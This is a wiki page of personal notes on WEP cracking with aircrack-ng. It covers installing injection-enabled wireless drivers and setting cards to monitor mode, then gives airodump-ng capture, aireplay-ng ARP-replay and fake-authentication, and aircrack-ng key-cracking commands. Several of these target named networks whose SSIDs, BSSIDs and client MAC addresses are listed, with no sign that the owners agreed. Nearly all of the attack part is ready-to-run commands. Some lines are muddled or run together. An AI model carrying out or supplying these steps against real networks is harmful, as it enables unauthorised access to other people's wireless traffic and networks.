Aircrack: Difference between revisions

Install aircrack-ng

For compiling injection drivers.

yum install kernel-headers

Optionally install kismet.

yum install kismet

compile injection enabled drivers

Remove maybe conflicting driver.

mv /lib/modules/`uname -r`/kernel/drivers/net/wireless/rt2x00/* /tmp/rt2x00
depmod -ae

rt73

wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-2.0.1.tar.bz2
tar -xjf rt73-k2wrlz-2.0.1.tar.bz2
cd rt73-k2wrlz-2.0.1/Module
make
make install
modprobe rt73

rt61 wget http://rt2x00.serialmonkey.com/rt61-cvs-daily.tar.gz tar xvfz rt61-cvs-daily.tar.gz cd rt61-cvs-* cd Module make make install

madwifi-ng

svn -r 2834 checkout http://svn.madwifi.org/madwifi/trunk/ madwifi-ng2834
wget http://patches.aircrack-ng.org/madwifi-ng-r2277.patch
cd madwifi-ng2834
patch -Np1 -i ../madwifi-ng-r2277.patch
./scripts/madwifi-unload
make
make install
depmod -ae
modprobe ath_pci

operation

Load and tweaked driver.

ifconfig rausb0 up
iwconfig rausb0 mode monitor
iwpriv rausb0 rfmontx 1

Change speed on network card.

iwconfig rausb0 rate 1M

Write comunication from ap.

airodump-ng --write wifi-network1 --channel 11 --bssid 00:90:4C:7E:00:6E rausb0

Generate network comunication.

aireplay-ng --arpreplay -b 00:90:4C:7E:00:6E -h 00:1B:11:BC:D5:1B rausb0

Crack web key.

aircrack-ng -z -b 00:90:4C:7E:00:6E wifi-network1*.cap

kismet

kismet

/etc/kismet/kismet.conf

source=iwl4965,wlan0,addme
source=rt73,wlan1,wlan1
source=rt73,rausb0,rausb0
source=rt2500,rausb0,RT73

Information

netgear DWL-G122 
mac:	00:1B:11:BC:D5:1B

Name    : B2_private_49
SSID    : B2_private_49
BSSID   : 00:01:38:9A:91:EC
Channel : 11

Name    : vgrox
SSID    : vgrox
BSSID   : 00:13:46:E1:2F:4F
Channel : 9
client:	00:13:46:E1:2F:4F

airodump-ng --ivs --write dump2 --channel 9 --bssid 00:13:46:E1:2F:4F rausb0

ifconfig rausb0 up
iwconfig rausb0 mode monitor
iwpriv rausb0 rfmontx 1

atheros

wlanconfig ath create wlandev wifi0 wlanmode monitor

ifconfig ath0 down
wlanconfig ath0 destroy
wlanconfig ath create wlandev wifi0 wlanmode [sta|adhoc|ap|monitor|wds|ahdemo]

ongoing

00:40:96:a6:ca:1b
00:40:96:a6:ca:1c
06:40:96:A6:CA:1C 

Name    : default
ESSID   : default
BSSID   : 00:13:46:4B:37:DE
Channel : 6

00:16:CE:4C:B7:53

airmon-ng stop ath0
airmon-ng start wifi0 6
capture iv:s. 
airodump-ng -c 6 --bssid 00:13:46:4B:37:DE -w airdump-ng-defaul ath0
fake authentication -e name -a -a access point MAC address -h 
aireplay-ng -1 0 -e default -a 00:14:6C:7E:40:80 -h 00:40:96:a6:ca:1c ath0
aireplay-ng -1 0 -e default -a 00:13:46:4B:37:DE -h 06:40:96:A6:CA:1C ath0
aireplay-ng -3 -b 00:13:46:4B:37:DE -h 00:16:CE:4C:B7:53 ath0